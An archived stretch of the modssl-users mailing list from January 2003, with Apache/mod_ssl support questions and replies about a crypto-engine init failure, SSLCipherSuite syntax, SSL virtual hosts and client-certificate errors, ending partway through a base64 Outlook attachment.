References: <1F6B1C04A612D311B27400A0C9ECE51202A1CAB1@NAWNT02.naples.eur.slb.com> <000901c2c886$1b2c0dc0$9ba8c4d9@homecomp>
Content-Type: multipart/mixed;
 boundary="------------1089EB936418B7FE7B05A252"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------1089EB936418B7FE7B05A252
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello All,

Please provide your thoughts on the problem I am facing.

We use Apache 1.3.27 , mod_ssl 2.8.12 and OpenSSL 0.9.6h[engine]. The
[engine] version is used because we use nCipher card as the hardware
accelerator.  The error that is baffling is:

 ./apachectl startssl
./apachectl startssl: httpd could not be started

ssl_engine_log :
[30/Jan/2003 08:12:23 01657] [error] Init: Failed to enable Crypto Device
API `chil'

error_log:
[Thu Jan 30 08:12:23 2003] [error] mod_ssl: Init: Failed to enable Crypto
Device API `chil

I do not have much idea on this. Hence I request you to me atleast some
pointers.

Thanks in advance,
Anbu


--------------1089EB936418B7FE7B05A252
Content-Type: text/x-vcard; charset=us-ascii;
 name="chezhian.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Anbuchezhian
Content-Disposition: attachment;
 filename="chezhian.vcf"

begin:vcard 
n:Chelliah;Anbuchezhian
tel;work:91-80-2051166
x-mozilla-html:FALSE
adr:;;;;;;
version:2.1
email;internet:chezhian@india.hp.com
fn:Anbuchezhian
end:vcard

--------------1089EB936418B7FE7B05A252--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 19:32:59 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6A2202AA0A2; Thu, 30 Jan 2003 19:32:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from cathedral.teiresias.net (k215.denver.dsl.forethought.net [216.241.42.215])
	by master.modssl.org (Postfix) with ESMTP id 00EF72AA081
	for ; Thu, 30 Jan 2003 19:32:55 +0100 (CET)
Received: from winter.teiresias.net (IDENT:HvIb7sLdg4a/Pwk5DgnXFL1OxW+TLJEL@winter [192.168.10.15])
	by cathedral.teiresias.net (8.9.3/8.9.3) with ESMTP id LAA02518
	for ; Thu, 30 Jan 2003 11:37:31 -0700
Received: (from tyr@localhost)
	by winter.teiresias.net (8.11.6/8.9.3) id h0UIc4921908
	for modssl-users@modssl.org; Thu, 30 Jan 2003 11:38:04 -0700
Date: Thu, 30 Jan 2003 11:38:04 -0700
From: Steve Chadsey 
To: modssl-users@modssl.org
Subject: Re: Verifying enabled ciphers?
Message-ID: <20030130113804.D19628@winter.teiresias.net>
References: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk> <20030127104727.G24717@winter.teiresias.net> <20030127195253.GA1090@serv01.aet.tu-cottbus.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20030127195253.GA1090@serv01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Mon, Jan 27, 2003 at 08:52:53PM +0100
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Chadsey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

One more question regarding the SSLCipherSuite line.  Our security
auditor recommended that we change the line
  SSLCipherSuite HIGH:MEDIUM:!ADH
to
  SSLCipherSuite HIGH:MEDIUM:-ADH:-aNULL

What is the difference?  
  openssl ciphers -v 'HIGH:MEDIUM:!ADH'
and
  openssl ciphers -v 'HIGH:MEDIUM:-ADH:-aNULL'

both return the same cipher list.  Is there a practical difference
in the two directives?

Thanks,
-- 
Steve 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 19:42:40 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C8812AA0CE; Thu, 30 Jan 2003 19:42:40 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR004.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 251712AA0A0
	for ; Thu, 30 Jan 2003 19:42:39 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.190.12])
 by VL-MS-MR004.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with SMTP id <0H9J00L1VIP1L2@VL-MS-MR004.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 30 Jan 2003 13:43:49 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Thu,
 30 Jan 2003 13:42:23 -0500
Date: Thu, 30 Jan 2003 13:42:23 -0500
From: Geoff Thorpe 
Subject: Re: Failed to enable Crypto Device API
In-reply-to: <3E396966.6BB5D618@india.hp.com>
To: modssl-users@modssl.org
Message-id: <20030130184223.GD1850@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References:
 <1F6B1C04A612D311B27400A0C9ECE51202A1CAB1@NAWNT02.naples.eur.slb.com>
 <000901c2c886$1b2c0dc0$9ba8c4d9@homecomp> <3E396966.6BB5D618@india.hp.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Anbuchezhian (chezhian@india.hp.com) wrote:
> Hello All,
> 
> Please provide your thoughts on the problem I am facing.
> 
> We use Apache 1.3.27 , mod_ssl 2.8.12 and OpenSSL 0.9.6h[engine]. The
> [engine] version is used because we use nCipher card as the hardware
> accelerator.  The error that is baffling is:
> 
>  ./apachectl startssl
> ./apachectl startssl: httpd could not be started
> 
> ssl_engine_log :
> [30/Jan/2003 08:12:23 01657] [error] Init: Failed to enable Crypto Device
> API `chil'
> 
> error_log:
> [Thu Jan 30 08:12:23 2003] [error] mod_ssl: Init: Failed to enable Crypto
> Device API `chil
> 
> I do not have much idea on this. Hence I request you to me atleast some
> pointers.

Try changing the SSLLogLevel directive to spit out more information. As
apache is stopping virtually immediately, you could probaby afford to
set "SSLLogLevel debug".

Anyway, that should probably dump the OpenSSL errors to the log too,
which I believe will give you more clue as to the problem (most likely
the nCipher-specific shared-library that openssl tries to load couldn't
be found).

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 19:42:51 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9D4E2AA0D5; Thu, 30 Jan 2003 19:42:51 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 486A72AA081
	for ; Thu, 30 Jan 2003 19:42:50 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 2A6203252
	for ; Thu, 30 Jan 2003 19:42:45 +0100 (MET)
Received: from serv01.aet.tu-cottbus.de ([127.0.0.1])
 by localhost (serv01 [127.0.0.1:10024]) (amavisd-new) with LMTP id 10252-01-2
 for ; Thu, 30 Jan 2003 19:42:44 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 72C25324A; Thu, 30 Jan 2003 19:42:40 +0100 (MET)
Date: Thu, 30 Jan 2003 19:42:40 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Verifying enabled ciphers?
Message-ID: <20030130184239.GA10268@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <9B66BBD37D5DD411B8CE00508B69700F033F25A9@pborolocal.rnib.org.uk> <20030127104727.G24717@winter.teiresias.net> <20030127195253.GA1090@serv01.aet.tu-cottbus.de> <20030130113804.D19628@winter.teiresias.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030130113804.D19628@winter.teiresias.net>
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.3i
X-Virus-Scanned: by amavisd-new
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jan 30, 2003 at 11:38:04AM -0700, Steve Chadsey wrote:
> One more question regarding the SSLCipherSuite line.  Our security
> auditor recommended that we change the line
>   SSLCipherSuite HIGH:MEDIUM:!ADH
> to
>   SSLCipherSuite HIGH:MEDIUM:-ADH:-aNULL
> 
> What is the difference?  
>   openssl ciphers -v 'HIGH:MEDIUM:!ADH'
> and
>   openssl ciphers -v 'HIGH:MEDIUM:-ADH:-aNULL'
> 
> both return the same cipher list.  Is there a practical difference
> in the two directives?

Hmm, not now.

aNULL is equivalent to ADH, as Anonymous DH ciphers are the only aNULL
ciphers supported. If at any point in the future an anonymous cipher
without DH would be added (does such thing exist?), it might make
a difference.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 22:15:21 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 963302AA0A2; Thu, 30 Jan 2003 22:15:20 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from uccinc.net (ns1.uccinc.net [216.161.174.2])
	by master.modssl.org (Postfix) with ESMTP id F09252AA09E
	for ; Thu, 30 Jan 2003 22:15:17 +0100 (CET)
Received: (from apache@localhost)
	by uccinc.net (8.11.6/linuxconf) id h0ULFDB19442
	for modssl-users@modssl.org; Thu, 30 Jan 2003 14:15:13 -0700
X-Authentication-Warning: uccinc.net: apache set sender to tom@openadventures.org using -f
Received: from phx-gw3-2600.uccinc.net ( [phx-gw3-2600.uccinc.net])
	as user tom@openadventures.org by www.openadventures.org with HTTP;
	Thu, 30 Jan 2003 14:15:11 -0700
Message-ID: <1043961311.3e3995df37747@www.openadventures.org>
Date: Thu, 30 Jan 2003 14:15:11 -0700
From: Tom Smith 
To: modssl-users@modssl.org
Subject: Setting up VirtualHost with SSL
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
X-Originating-IP: 216.161.174.16
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tom Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm learning how to use SSL with virtual host. So far, I've figured out how to
make it work. What I'm curious about is if there's a way to nest the SSL options
into the main VirtualHost directive.

Here's my current config:
----------

  ServerAdmin     webmaster@openadventures.org
  NameVirtualHost 216.161.174.139
  ServerName      www.openadventures.org
  User            apache
  Group           apache
  DocumentRoot    /httpd/openadventures/public_html
  CustomLog       /var/log/httpd/openadventures_access_log Combined
  Options         ExecCgi Includes
  ScriptAlias     /cgi-bin/ /httpd/openadventures/public_html/cgi-bin/
  
    Options         None
    AllowOverride   AuthConfig
    AuthName        "Perma-Cool"
    AuthType        Basic
    AuthDBUserFile **********
    require user **********
  


  
    ServerName      www.openadventures.org
    SSLEngine       on
    DocumentRoot    /httpd/openadventures/public_html/
    ErrorLog        /var/log/httpd/openadventures_error_log
    TransferLog     /var/log/httpd/openadventures_transfer_log
    SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
    SSLCertificateFile      /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile   /etc/httpd/conf/ssl.key/server.key
    
      SSLOptions +StdEnvVars
    
    
      Options Indexes FollowSymLinks
      AllowOverride All
      Order allow,deny
      Allow from all
      SSLOptions +StdEnvVars
    
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0
    CustomLog /var/log/httpd/openadventures_ssl_request_log "%t %h
%{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
  

----------

This is the only way I've been able to get it to work. I'm looking to make
things more managable, easier to follow, and very refined.

Is there a better way to set this up?

Tom Smith
tom@openadventures.org
http://www.openadventures.org/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 23:55:05 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 248592AA0A2; Thu, 30 Jan 2003 23:55:05 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from rdsl_mlb_mx1.requestdsl.com.au (rdsl-mlb-mx1.requestdsl.com.au [202.138.194.10])
	by master.modssl.org (Postfix) with ESMTP id 60DE42AA09E
	for ; Thu, 30 Jan 2003 23:55:02 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Can't get to Https but http://address:443 works?????
Date: Fri, 31 Jan 2003 09:53:43 +1100
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B59014EA3EB@rdsl_mlb_mx1.requestdsl.com.au>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Verifying enabled ciphers?
Thread-Index: AcLIj41WIhccVJDQS0CuVF0SZTfc+AAIppAA
From: "Vince Montuoro" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi guys,

Just a quick question my server just fell,=20

i can't get back to https://theaddress,
only http://theaddress:443 works???

any thoughts?

Vince
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 23:59:07 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 660342AA0A2; Thu, 30 Jan 2003 23:59:07 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (d-128-6-49.bootp.Virginia.EDU [128.143.6.49])
	by master.modssl.org (Postfix) with ESMTP id CCC632AA09E
	for ; Thu, 30 Jan 2003 23:59:05 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h0UMoS2P000629
	for ; Thu, 30 Jan 2003 17:50:29 -0500
Date: Thu, 30 Jan 2003 17:50:28 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Can't get to Https but http://address:443 works?????
In-Reply-To: <25B12856E53F0047BE90FB2CFC0D1B59014EA3EB@rdsl_mlb_mx1.requestdsl.com.au>
Message-ID: 
References: <25B12856E53F0047BE90FB2CFC0D1B59014EA3EB@rdsl_mlb_mx1.requestdsl.com.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 31 Jan 2003, Vince Montuoro wrote:

> i can't get back to https://theaddress,
> only http://theaddress:443 works???

You probably don't have

SSLEngine on

in your SSL vhost.  Right now, the client and server are both speaking
HTTP, not HTTPS... the fact that it's over port 443 and not port 80 is
irrelevant.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 23:59:19 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0BB5E2AA0D3; Thu, 30 Jan 2003 23:59:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ender.unirez.com (mail.unirez.com [12.106.208.115])
	by master.modssl.org (Postfix) with SMTP id 4BC702AA0D2
	for ; Thu, 30 Jan 2003 23:59:17 +0100 (CET)
Received: (qmail 24365 invoked by uid 111); 30 Jan 2003 22:59:06 -0000
Received: from jtinley@unirez.com by ender.unirez.com with qmail-scanner-1.00 (sweep: 2.10/3.66. . Clean. Processed in 1.005011 secs); 30 Jan 2003 22:59:06 -0000
Received: from h178.unirez.com (HELO 10249) (192.168.1.178)
  by ender.unirez.com with SMTP; 30 Jan 2003 22:59:05 -0000
From: "Jeremy Tinley" 
To: 
Subject: RE: Can't get to Https but http://address:443 works?????
Date: Thu, 30 Jan 2003 16:59:02 -0600
Message-ID: <000701c2c8b3$2eb043c0$b201a8c0@unirez.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
Importance: Normal
In-Reply-To: <25B12856E53F0047BE90FB2CFC0D1B59014EA3EB@rdsl_mlb_mx1.requestdsl.com.au>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeremy Tinley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You are starting it with apachectl start instead of apachectl startssl ?

Sounds like it's listening on 443 for http, not https connections.


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On
Behalf Of Vince Montuoro
Sent: Thursday, January 30, 2003 4:54 PM
To: modssl-users@modssl.org
Subject: Can't get to Https but http://address:443 works?????


Hi guys,

Just a quick question my server just fell, 

i can't get back to https://theaddress,
only http://theaddress:443 works???

any thoughts?

Vince
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 31 10:12:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DC52C2AA0A0; Fri, 31 Jan 2003 10:12:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mel-rto3.wanadoo.fr (smtp-out-3.wanadoo.fr [193.252.19.233])
	by master.modssl.org (Postfix) with ESMTP id 5BC822AA09C
	for ; Fri, 31 Jan 2003 10:12:33 +0100 (CET)
Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto3.wanadoo.fr (6.7.015)
        id 3E0C33B5015B7870 for modssl-users@modssl.org; Fri, 31 Jan 2003 10:12:28 +0100
Received: from OTANTAOUI (217.128.188.169) by mel-rta8.wanadoo.fr (6.7.015)
        id 3E26DA700089290E for modssl-users@modssl.org; Fri, 31 Jan 2003 10:12:28 +0100
From: "Omar TANTAOUI" 
To: "Modssl-Users" 
Subject: Error while requesting client cert authentication 
Date: Fri, 31 Jan 2003 10:12:27 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0002_01C2C911.41B0D490"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-MS-TNEF-Correlator: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar TANTAOUI" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0002_01C2C911.41B0D490
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi everybody,

I am using Apache-1.3.27 with mod_ssl-2.8.12 and OpenSSL-0.9.7.

I have created a secure area that requires client SSL authentication:


DocumentRoot "/var/www/html"
ServerName 192.168.2.237
ServerAdmin administrator@atexo.com
ErrorLog logs/ssl_error_log
TransferLog logs/ssl_access_log

SSLEngine on

SSLCipherSuite ALL

SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key

SSLCACertificateFile /var/www/html/pki/ATEXO/testUserCert/ATEXO.crt

SSLCARevocationFile /var/www/html/pki/testUserCert/ATEXO.crl


SSLOptions +StdEnvVars +CompatEnvVars
SSLVerifyClient require
SSLVerifyDepth 2



SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


The server responds correctly to clients (IE or Mozilla) when it is freshly
started. But after few minutes of running, I try to access to the same page
with Mozilla but it fails with the error: "Error establishing an encryted
connection to 192.168.2.237. Error Code: -12192" and IE displays a classical
error "Page not found".

When it happens, The Apache log contains these lines:
[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Certificate Verification: Error
(7): certificate signature failure
[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Re-negotiation handshake failed:
Not accepted by client!?
[Fri Jan 31 10:10:44 2003] [error] mod_ssl: Certificate Verification: Error
(7): certificate signature failure
[Fri Jan 31 10:10:44 2003] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Fri Jan 31 10:10:44 2003] [error] OpenSSL:
error:0D0890A1:lib(13):func(137):reason(161)
[Fri Jan 31 10:10:44 2003] [error] OpenSSL:
error:140890B2:lib(20):func(137):reason(178)

Please any help is welcome. It has been 10 days that I'm trying to solve
this problem ...

Best regards

------=_NextPart_000_0002_01C2C911.41B0D490
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="winmail.dat"

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
